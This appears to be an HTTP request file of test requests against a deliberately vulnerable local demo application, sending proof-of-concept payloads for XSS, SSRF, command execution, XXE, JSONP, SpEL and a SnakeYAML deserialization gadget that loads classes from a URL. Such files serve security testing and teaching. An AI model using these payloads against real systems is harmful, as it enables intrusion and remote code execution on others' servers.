###
GET http://localhost:80/api/xss/bad?name=<script>alert(1)</script>

###
GET http://localhost:80/api/ssrf/bad?url=http://localhost:80/api/xss/bad?name=<script>alert(1)</script>

###
GET http://localhost:80/api/rce/bad02?cmd=ls

###
GET http://localhost:80/api/xxe/bad01?xml=<!DOCTYPE doc [<!ENTITY xxe SYSTEM \"http://127.0.0.1:1664\">]><doc>&xxe;</doc>

###
GET http://localhost:80/api/jsonp/bad01?callback=<script>alert(1)</script>

###
GET http://localhost:80/api/spel/bad01?cmd=vulnhere

###
GET http://localhost:80/api/yaml/bad01?payload=!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "  + "[[!!java.net.URL [\"http://localhost\"]]]]


###
GET http://localhost:80/api/scriptengine/bad01?payload=xx

